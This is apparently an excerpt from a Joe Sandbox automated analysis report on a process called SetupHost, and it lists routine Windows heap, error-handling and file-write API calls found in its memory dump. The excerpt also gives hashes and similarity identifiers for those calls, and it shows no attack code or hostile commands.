                                                                                                                                                                                                                  • Part of subcall function 009E13ED: RtlNtStatusToDosError.NTDLL ref: 009E14EF
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: RtlNtStatusToDosError.NTDLL ref: 009E14FD
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: SetLastError.KERNEL32(00000000), ref: 009E1519
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Error$ProcessStatus$AllocFreeLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1546159109-0
                                                                                                                                                                                                                • Opcode ID: a38e1fe0e726b1642eb19a229a648e3a1518059d5ed1e54eb9c224f6e54e8a4d
                                                                                                                                                                                                                • Instruction ID: c0154ced43620df431c7fd54e1b830e75b7168a8631d7129430e45111334dcd3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a38e1fe0e726b1642eb19a229a648e3a1518059d5ed1e54eb9c224f6e54e8a4d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04317375A00249ABCF06DFB5C94AAAEB7B9FF88700F048569E515E7351EB70CE01CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,009A1B22,?), ref: 009B9BAD
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,009A1B22,?), ref: 009B9BB4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,009A1B22,?), ref: 009B9BFE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B9C05
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: 3434f290ece5511c76a01932038dea78f8b284b686515ff6a81f6e746b468b52
                                                                                                                                                                                                                • Instruction ID: ea76099b0129d2d91c6b6cdaf788227eb91678e9c29e4af7581d082b41b4fd90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3434f290ece5511c76a01932038dea78f8b284b686515ff6a81f6e746b468b52
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97212832610225ABCB15DBA9D684BFE7A7AAFD8370F154428FB05CB340CA34CC028790
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000018,00000000,00000000,00000001,00000001,?,009B8133,00000000), ref: 00A08BC8
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009B8133,00000000), ref: 00A08BCF
                                                                                                                                                                                                                  • Part of subcall function 00A08652: GetProcessHeap.KERNEL32(00000000,00000001,00A08BE3,?,009B8133,00000000), ref: 00A08661
                                                                                                                                                                                                                  • Part of subcall function 00A086B7: HeapFree.KERNEL32(00000668,00000000,?), ref: 00A086CE
                                                                                                                                                                                                                  • Part of subcall function 00A08691: HeapFree.KERNEL32(00000668,00000000,?), ref: 00A086A8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A08C5C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A08C63
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$Alloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2768201423-0
                                                                                                                                                                                                                • Opcode ID: b6fdfb053825c8f600c19806981f6abdfa3a4a80333925a15d251f8d27721d2d
                                                                                                                                                                                                                • Instruction ID: f644f39c58c72c57e8a87a92533007d33face4c61aa6b25506c12a3bbaa08e5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6fdfb053825c8f600c19806981f6abdfa3a4a80333925a15d251f8d27721d2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4411B7717003086BEB14A7B5AD95A7F797AEBC5350F050028F586D72C1DE399D028274
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000020,?,?,00000000,?,009CFC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 009D00AE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009CFC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 009D00B5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009CFC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 009D0113
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009CFC8B), ref: 009D011A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: a939ef3fe885d79e1b55fdc791e46de40f1ed683dca8aa2ff7c7199ea57e14b7
                                                                                                                                                                                                                • Instruction ID: 3f02362624c11a4bd34f84c4ff7fee45ab7a6c387e714c42b4bdd931c277edfa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a939ef3fe885d79e1b55fdc791e46de40f1ed683dca8aa2ff7c7199ea57e14b7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC212CB16487019FD708CF59D854A6ABBE9EF98350F15C46EE449CB361D770D800CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 009E419C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E41A3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 009E41D4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E41DB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: 17755f0da4e160ee0fd0463de25ffd9807467a4f8678f3ea0a95af4d7fbaf0c2
                                                                                                                                                                                                                • Instruction ID: 6ddee2e258b8e18b2c696bc56b1dcd69af769ed387814332f46943a4858122b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17755f0da4e160ee0fd0463de25ffd9807467a4f8678f3ea0a95af4d7fbaf0c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67118235A04305ABCB11DFDADC88A9EBBB9EFA8340B148468E55993240C770DD418B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009ECBCF: GetProcessHeap.KERNEL32(00000000,00100010,00000000,009E5849,?,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,009DE358), ref: 009ECBDB
                                                                                                                                                                                                                  • Part of subcall function 009ECBCF: HeapAlloc.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009ECBE2
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,009E3202,?,?,00000000,00000000,?,00000000,?,?,009DDD7D,?), ref: 009EA61F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009E3202,?,?,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000), ref: 009EA62E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E3202), ref: 009EA635
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,009E3202,?,?,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000), ref: 009EA640
                                                                                                                                                                                                                  • Part of subcall function 009EAB1C: memset.MSVCRT ref: 009EAB43
                                                                                                                                                                                                                  • Part of subcall function 009ECBFE: WriteFile.KERNEL32(00000000,00000010,?,00000000,00000000), ref: 009ECC23
                                                                                                                                                                                                                  • Part of subcall function 009ECBFE: SetLastError.KERNEL32(000000EA,?,009ECCB1,00000000,00000000,00000000,00000000,00000000,?,009E5922,00000004,00000000,00000000), ref: 009ECC3A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$Process$AllocFileFreeWritememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3684435218-0
                                                                                                                                                                                                                • Opcode ID: 79806f56bac7117c09031973223d6de3ce1eb4c9931c1a3254dcac4adb0778ef
                                                                                                                                                                                                                • Instruction ID: 40b63a1100e66c91b2017b6768b18e930ff5ec9f47e31feff4247923bb1c394c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79806f56bac7117c09031973223d6de3ce1eb4c9931c1a3254dcac4adb0778ef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0501793170025157D723AB674845B6F6EAE9BE5F50F188515FD0997261EE70EC0281A2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,23FAFFD7,?,?,00000000,00000000,00A11005,000000FF,?,00A01609,0052B3E8,009FEBF8,?,?,009A27CB), ref: 00A01675
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A0167C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0052B3E8,23FAFFD7,?,?,00000000,00000000,00A11005,000000FF,?,00A01609,0052B3E8,009FEBF8,?,?,009A27CB), ref: 00A01685
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A0168C
                                                                                                                                                                                                                  • Part of subcall function 00A014E5: GetLastError.KERNEL32(23FAFFD7,00000000,0052B3E8,?,00A1103B,000000FF,?,00A01659,?,23FAFFD7,?,?,00000000,00000000,00A11005,000000FF), ref: 00A01517
                                                                                                                                                                                                                  • Part of subcall function 00A014E5: GetProcessHeap.KERNEL32(00000000,?,23FAFFD7,00000000,0052B3E8,?,00A1103B,000000FF,?,00A01659,?,23FAFFD7,?,?,00000000,00000000), ref: 00A01570
                                                                                                                                                                                                                  • Part of subcall function 00A014E5: HeapFree.KERNEL32(00000000,?,00A01659), ref: 00A01577
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2495544939-0
                                                                                                                                                                                                                • Opcode ID: 1bd332be737630b65e2778948c5a666583551ee504b09d9229692fcb59f931e4
                                                                                                                                                                                                                • Instruction ID: a563028097c6be2fe809fde3b78fd6c6085ea0edf1204ba74dd9d4bbee01d207
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bd332be737630b65e2778948c5a666583551ee504b09d9229692fcb59f931e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA118276604705ABD724CF95EC44FABB7E8FB48B55F04852DF516836D0CB76A801CB20
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                • Opcode ID: a0a7a9a0ce66be547196d4b0cd68f1f4cdb30d3353f96c7b97db9f872edfa82c
                                                                                                                                                                                                                • Instruction ID: 25964f34fd2c99674049ef2f8ada90240fcd8649bf52f5c9ac52962208566c9b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0a7a9a0ce66be547196d4b0cd68f1f4cdb30d3353f96c7b97db9f872edfa82c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F0C8A260025C6BD221E7A5DC88EE377EDC7C4304F540826B155C3001E6B4EDD48B70
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0052B3FC,?,00000000,0052B3E8,?,?,00A014DD,00000000), ref: 00A016D2
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,00000000,0052B3E8,?,?,00A014DD,00000000), ref: 00A016D9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                • Opcode ID: 66ba9e1ba72a432f1f7d3b7acc75e94647480bc22eff90e6b1f1f4147429a86f
                                                                                                                                                                                                                • Instruction ID: c3aabfa81777d3c58db329ffdbe2281fd3c9f3c4f36c6c1b6e220de5a09098e4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66ba9e1ba72a432f1f7d3b7acc75e94647480bc22eff90e6b1f1f4147429a86f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22013C71604305AFC720CF95EC84B96B7F9FB88752F18882EE19AC7590D671A451CB64
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,23FAFFD7,?,?,?,00A11020,000000FF), ref: 00A01910
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A01917
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,23FAFFD7,?,?,?,00A11020,000000FF), ref: 00A0192C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,23FAFFD7), ref: 00A01933
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: 7f411d1ba7aa2578386840332abdaf049eb88028b5a9eb22c5e38b9d01b000ff
                                                                                                                                                                                                                • Instruction ID: 1479ff24605b00a32192cc8137504b18a20ced82e93d655d43b0c1ea379fdeb6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f411d1ba7aa2578386840332abdaf049eb88028b5a9eb22c5e38b9d01b000ff
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F01DF32504744EBC720DBA5D919FCBBBF8FB08761F00841AF416832D0CBB89541CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: GetProcessHeap.KERNEL32(00000008,00000820,?,00000000,00000000,?,?,?,?,?,?,?,?,?,009E5463,?), ref: 009EC9B5
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,009E5463,?,00000000), ref: 009EC9BC
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009ECAFE
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: HeapFree.KERNEL32(00000000), ref: 009ECB05
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009ECB1B
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: HeapFree.KERNEL32(00000000), ref: 009ECB22
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: GetProcessHeap.KERNEL32(00000000,?), ref: 009ECB32
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: HeapFree.KERNEL32(00000000), ref: 009ECB39
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009ECB46
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: HeapFree.KERNEL32(00000000), ref: 009ECB4D
                                                                                                                                                                                                                  • Part of subcall function 009EC97F: SetLastError.KERNEL32(00000000), ref: 009ECB54
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009E5467
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009E547A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E5481
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 009E5491
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$ErrorLast$Alloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 646459838-0
                                                                                                                                                                                                                • Opcode ID: 4bbf63c053303340d51569cfd864381cefe975199de88e0ad3a81c9373fcc972
                                                                                                                                                                                                                • Instruction ID: 1338c6ad23b052efadc684608474b6ff34f7a025fcbfe33c9e08db1c8be33034
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bbf63c053303340d51569cfd864381cefe975199de88e0ad3a81c9373fcc972
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F06772D10328BBCB01EBF59909BDEBBB8AF04B66F118561E905E7090E6348A41CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000018,00000000,009E7299,?,00000000,?,009E76BB,?,?,?,?), ref: 009E83E1
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,009E76BB,?,?,?,?), ref: 009E83E8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00001144,?,00000000,?,009E76BB,?,?,?,?), ref: 009E8402
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,009E76BB,?,?,?,?), ref: 009E8409
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                • Opcode ID: c08fd4efc109bded81db2d0671286a28743ecb4017db6fe5b74ece74d62e2b60
                                                                                                                                                                                                                • Instruction ID: 85d0f1860ffaa4ea5f6b4d445f1305915ad208aa002dd3780145c3ad21ea54c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c08fd4efc109bded81db2d0671286a28743ecb4017db6fe5b74ece74d62e2b60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0F6716447528BD322CFE6DC0879779B6FB44751F04C418E1098A2A4DF74C9018B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000436C,?,00000000,009E7204), ref: 009E8027
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,009E7204), ref: 009E802E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E8062
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E8069
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: ff76db6782604a90832577c65d9274d1031163f590d8bb92ccb15a9fac92d60c
                                                                                                                                                                                                                • Instruction ID: 0a54c3ddebc94b04a85483185f4321bdac060b24fff29383558e604d8d86bfdb
